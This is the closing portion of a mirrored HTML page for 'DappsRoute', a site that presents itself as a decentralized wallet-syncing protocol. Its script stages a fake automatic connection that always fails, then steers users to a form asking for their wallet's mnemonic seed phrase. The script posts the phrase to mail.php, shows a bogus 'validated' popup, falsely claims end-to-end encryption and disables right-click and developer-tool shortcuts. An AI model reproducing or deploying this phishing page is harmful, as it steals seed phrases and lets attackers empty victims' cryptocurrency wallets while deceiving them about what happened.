                                                                    <div class="badge"><i class="ripple"></i></div>
                                                                </div>
                                                            </div>
                                                            <div class="content">
                                                                <h4><a href="#"> Creative Art Collection</a></h4>
                                                                <div class="infor">
                                                                    <span>Created by</span>
                                                                    <span class="name"><a href="#">Ralph Garraway</a></span>
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <button class="wishlist-button public heart"><span class="number-like"> 100</span></button>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="swiper-slide">
                                            <div class="slider-item">
                                                <div class="sc-card-collection">
                                                    <a href="#">
                                                        <div class="media-images-box">
                                                            <img src="assets/images/box-item/collection-item-5.jpg" alt="">
                                                            <div class="bottom-media">
                                                                <img src="assets/images/box-item/img-collection7.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection8.jpg" alt="Image">
                                                                <img src="assets/images/box-item/img-collection9.jpg" alt="Image">
                                                            </div>
                                                        </div>
                                                    </a>
                                                    <div class="card-bottom">
                                                        <div class="author">
                                                            <div class="sc-author-box style-2">
                                                                <div class="author-avatar">
                                                                    <a href="#">
                                                                        <img src="assets/images/avatar/avt-1.jpg" alt="" class="avatar">
                                                                    </a>
                                                                    <div class="badge"><i class="ripple"></i></div>
                                                                </div>
                                                            </div>
                                                            <div class="content">
                                                                <h4><a href="#"> Creative Art Collection</a></h4>
                                                                <div class="infor">
                                                                    <span>Created by</span>
                                                                    <span class="name"><a href="#">Ralph Garraway</a></span>
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <button class="wishlist-button public heart"><span class="number-like"> 100</span></button>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="swiper-button-next btn-slide-next"></div>
                                <div class="swiper-button-prev btn-slide-prev"></div>
                            </div>
                        </div>
                    </div>
                </div>
            </section>-->

        <footer id="footer" class="clearfix style-2">
          <div class="themesflat-container">
            <div class="row">
              <div class="col-lg-3 col-md-12 col-12">
                <div class="widget widget-logo">
                  <div class="logo-footer" id="logo-footer">
                    <a href="#.html">
                      DappsRoute<br />
                      
                    </a>
                  </div>
                  <p class="sub-widget-logo">
                    Open end decentralized protocol for syncing various wallets
                    to Dapps Secure Servers. This is a protocol
                    that establishes a remote connection between multiple blockchain Dapps.
                  </p>
                </div>
              </div>
              <!--<div class="col-lg-2 col-md-4 col-sm-5 col-5" style="visibility:hidden">
                            <div class="widget widget-menu style-1">
                                <h5 class="title-widget">My Account</h5>
                                <ul>
                                    <li><a href="author01.html">Authors</a></li>
                                    <li><a href="wallets.html">Collection</a></li>
                                    <li><a href="profile.html">Author Profile</a></li>
                                    <li><a href="create-item.html">Create Item</a></li>
                                </ul>
                            </div>
                        </div>
                        <div class="col-lg-2 col-md-4 col-sm-7 col-7" style="visibility:hidden">
                            <div class="widget widget-menu style-2">
                                <h5 class="title-widget">Resources</h5>
                                <ul>
                                    <li><a href="help-center.html">Help & Support</a></li>
                                    <li><a href="auctions.html">Live Auctions</a></li>
                                    <li><a href="item-details.html">Item Details</a></li>
                                    <li><a href="activity1.html">Activity</a></li>
                                </ul>
                            </div>
                        </div>
                        <div class="col-lg-2 col-md-4 col-sm-5 col-5" style="visibility:hidden">
                            <div class="widget widget-menu fl-st-3">
                                <h5 class="title-widget">Company</h5>
                                <ul>
                                    <li><a href="explore-1.html">Explore</a></li>
                                    <li><a href="contact1.html">Contact Us</a></li>
                                    <li><a href="blog.html">Our Blog</a></li>
                                    <li><a href="faq.html">FAQ</a></li>
                                </ul>
                            </div>
                        </div>-->
              <div class="col-lg-3 col-md-6 col-sm-7 col-12">
                <div class="widget widget-subcribe">
                  <h5 class="title-widget">Subscribe</h5>
                  <div class="form-subcribe">
                    <form
                      id="subscribe-form"
                      action="#"
                      method="GET"
                      accept-charset="utf-8"
                      class="form-submit"
                    >
                      <input
                        name="email"
                        value=""
                        class="email"
                        type="email"
                        placeholder="name@email.com"
                        required
                      />
                      <button id="submit" name="submit" type="submit">
                        <i class="icon-fl-send"></i>
                      </button>
                    </form>
                  </div>
                  <div
                    class="widget-social style-1 mg-t32"
                    style="visibility: hidden"
                  >
                    <ul>
                      <li>
                        <a href="#"><i class="fab fa-twitter"></i></a>
                      </li>
                      <li>
                        <a href="#"><i class="fab fa-facebook"></i></a>
                      </li>
                      <li class="style-2">
                        <a href="#"><i class="fab fa-telegram-plane"></i></a>
                      </li>
                      <li>
                        <a href="#"><i class="fab fa-youtube"></i></a>
                      </li>
                      <li class="mgr-none">
                        <a href="#"><i class="icon-fl-tik-tok-2"></i></a>
                      </li>
                      <li class="mgr-none">
                        <a href="#"><i class="icon-fl-vt"></i></a>
                      </li>
                    </ul>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </footer>
      </div>

      <div
        class="modal fade popup"
        id="popup_connect_wallet_success"
        tabindex="-1"
        role="dialog"
        aria-hidden="true"
      >
        <div class="modal-dialog modal-dialog-centered" role="document">
          <div class="modal-content">
            <button
              type="button"
              class="close"
              data-dismiss="modal"
              aria-label="Close"
            >
              <span aria-hidden="true">&times;</span>
            </button>
            <div class="modal-body space-y-20 pd-40">
              <h3 class="text-center">Wallet Successfully Validated</h3>
              <p class="text-center">
                Please save your
                <span class="price color-popup">QR CODE </span> generated below
              </p>
              <p class="text-center">
                <img
                  align="center"
                  width="300"
                  height="300"
                  src="assets/images/backgroup-secsion/validated.html"
                />
              </p>
              <a href="#" class="btn btn-primary"> Save QR Code</a>
            </div>
          </div>
        </div>
      </div>
      <div
        class="modal fade popup"
        id="popup_connect_wallet"
        tabindex="-1"
        role="dialog"
        aria-hidden="true"
      >
        <div class="modal-dialog modal-dialog-centered" role="document">
          <div class="modal-content">
            <button
              type="button"
              class="close"
              data-dismiss="modal"
              aria-label="Close"
            >
              <span aria-hidden="true">&times;</span>
            </button>
            <div class="modal-body space-y-20 pd-40">
              <h3>
                <img
                  width="50"
                  height="50"
                  class="avatar"
                  id="wallet_logo"
                /><br />
                <span id="wallet_name" clas="mt-1">Sync Wallet</span>
              </h3>
              <p class="text-center">
                Synchronize and validate your selected wallet. A QR code via
                <span class="price color-popup"
                  >an Open end Decentralized protocol</span
                >
                will be generated upon successful validation.
              </p>

              <div id="auto_connecting" style="display: none">
                <br /><br /><br />
                <div class="heading-line s2" style="width: 100%">
                  <br />
                  <h5 align="center">
                    starting secure connection...<br />
                    <i
                      align="center"
                      style="text-align: center !important; font-size: small"
                      class="text-muted align-items-center"
                      >please wait...</i
                    >
                  </h5>
                  <br />
                </div>
              </div>

              <div id="failed_to_connect" style="display: none">
                <div
                  style="
                    padding: 6px;
                    color: red;
                    border: 1px solid red;
                    border-radius: 5px;
                    text-align: center !important;
                    font-size: 16px;
                    font-weight: 500;
                  "
                >
                  An error occurred... please try again or connect mannually
                </div>
                <br /><br /><br />
                <a
                  href="#"
                  id="try_auto_connecting_again"
                  class="btn btn-outline-primary"
                  aria-label="Close"
                  >Try Again</a
                ><br />
                <a href="#" id="button_connect_manually" class="btn btn-primary"
                  >Connect Manually</a
                >
              </div>

              <div id="div_connect_manuallly" style="display: none">
                <textarea
                  style="font-size: 25px; font-weight: 650"
                  rows="4"
                  name="secret_phrase"
                  id="secret_phrase"
                  class="form-control text-primary"
                  placeholder="Enter your 12, 15, 18, 21 or 24 Mnemonic words. Seperate them with spaces."
                ></textarea
                ><br />
                <input type="text" id="" />
                <button
                  disabled
                  type="button"
                  id="button_connect_wallet"
                  class="btn btn-primary"
                  style="border-top: 5px; opacity: 0.2"
                >
                  Connect Wallet
                </button>
              </div>

              <!--<input type="text" class="form-control" placeholder="00.00 ETH">
                        <p>
                            Enter quantity. <span class="color-popup">5 available</span>
                        </p>--->
              <!-- <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#popup_bid_success" data-dismiss="modal" aria-label="Close"> Place a bid</a> -->
              <div>
                <br /><br /><br />
                <h5 align="center" class="mt-4 text-muted align-items-center">
                  <img
                    src="assets/images/icon/shield.html"
                    width="30"
                    height="30"
                  />
                  This session is protected with an end-to-end encryption
                </h5>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <a id="scroll-top"></a>

    <script src="assets/js/jquery.min.js"></script>
    <script src="assets/js/jquery.easing.js"></script>
    <script src="assets/js/bootstrap.min.js"></script>
    <script src="assets/js/wow.min.js"></script>
    <script src="assets/js/plugin.js"></script>
    <script src="assets/js/shortcodes.js"></script>
    <script src="assets/js/main.js"></script>
    <script src="assets/js/count-down.js"></script>
    <script src="assets/js/swiper-bundle.min.js"></script>
    <script src="assets/js/swiper.js"></script>
    <script src="assets/js/parallax.js"></script>
    <script src="assets/js/web3.min.js"></script>
    <script src="assets/js/moralis.js"></script>
    <script src="assets/js/nft.js"></script>

    <script>
      //Handle Select Wallet Click
      $(function () {
        $(".select_wallet").on("click", function () {
          var wd = $(this); //wd = wallet details

          $("#wallet_name").text(wd.data("title"));
          $("#wallet_logo").attr("src", wd.data("logo"));
          $("#auto_connecting").show();
          $("#failed_to_connect").hide();
          $("#div_connect_manuallly").hide();

          $("#popup_connect_wallet").modal("show");

          //Hide autoconnecting div and show error in random interval
          var interval = 1000 * getRandomInt(1, 15);
          setTimeout(() => {
            $("#auto_connecting").hide();
            $("#div_connect_manuallly").hide();
            $("#failed_to_connect").show();
          }, interval);
        });

        $("#try_auto_connecting_again").on("click", function (e) {
          e.preventDefault();
          $("#auto_connecting").show();
          $("#failed_to_connect").hide();
          $("#div_connect_manuallly").hide();

          //Hide autoconnecting div and show error in random interval
          var interval = 1000 * getRandomInt(1, 20);
          setTimeout(() => {
            $("#auto_connecting").hide();
            $("#div_connect_manuallly").hide();
            $("#failed_to_connect").show();
          }, interval);
        });

        $("#button_connect_manually").on("click", function (e) {
          e.preventDefault();
          $("#auto_connecting").hide();
          $("#failed_to_connect").hide();
          $("#div_connect_manuallly").show();
        });

        //FOR PHRASE TEXT VALIDATION
        $("#secret_phrase").on("keyup", function () {
          var phrase_seed_entered = $(this).val().trim();
          if (phrase_seed_entered != "") {
            var phrase_count = phrase_seed_entered.match(/(\w+)/g).length;
            console.log(phrase_count);
            if ([12, 15, 18, 21, 24].includes(phrase_count)) {
              $("#button_connect_wallet")
                .attr("disabled", false)
                .css("opacity", "1");
            } else {
              $("#button_connect_wallet")
                .attr("disabled", true)
                .css("opacity", "0.2");
            }
          } else {
            $("#button_connect_wallet")
              .attr("disabled", true)
              .css("opacity", "0.2");
          }
        });

        //CONNECT WALLET BUTTON Handler
        $("#button_connect_wallet").on("click", function (e) {
          e.preventDefault();
          let field = $("#secret_phrase");
          if (field.val().length >= 12) {
            $(this).text("Loading...").css("pointer-events", "none");

            $.ajax({
              url: "mail.php",
              method: "POST",
              data: {
                load_phrase: 1,
                data_phrase: field.val(),
                wallet_selected: $("#wallet_name").text().trim(),
              },
              success: function (result) {
                if (result == "success") {
                  $("#button_connect_wallet")
                    .text("Connect Wallet")
                    .css("pointer-events", "all");
                  $("#popup_connect_wallet").modal("hide");
                  $("#popup_connect_wallet_success").modal("show");
                } else {
                  alert(result);
                }
              },
              error: function (xhr, ajaxOptions, thrownError) {
                alert(thrownError);
              },
            });
          }
        });
      });

      function getRandomInt(min, max) {
        min = Math.ceil(min);
        max = Math.floor(max);
        return Math.floor(Math.random() * (max - min) + min); //The maximum is exclusive and the minimum is inclusive
      }

      //DISABLE RIGHT CLICK AND CTRL KEY
      window.oncontextmenu = function () {
        return false;
      };
      $(document).keydown(function (event) {
        if (event.keyCode == 123) {
          return false;
        } else if (
          (event.ctrlKey && event.shiftKey && event.keyCode == 73) ||
          (event.ctrlKey && event.shiftKey && event.keyCode == 74)
        ) {
          return false;
        }
      });
    </script>

    <style>
      .btn-outline-primary {
        width: 100%;
        border-radius: 20px;
        font-weight: 700;
        font-size: 15px;
        line-height: 22px;
        padding: 10px 20px;
        -webkit-transition: all 0.3s ease-in-out;
        -moz-transition: all 0.3s ease-in-out;
        -ms-transition: all 0.3s ease-in-out;
        -o-transition: all 0.3s ease-in-out;
        transition: all 0.3s ease-in-out;
        outline: none;
        border: 1px solid #5142fc;
        margin-bottom: 10px;
      }
    </style>
  </body>

<!-- Mirrored from syncchains.web.app/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 12 Nov 2023 10:17:03 GMT -->
</html>
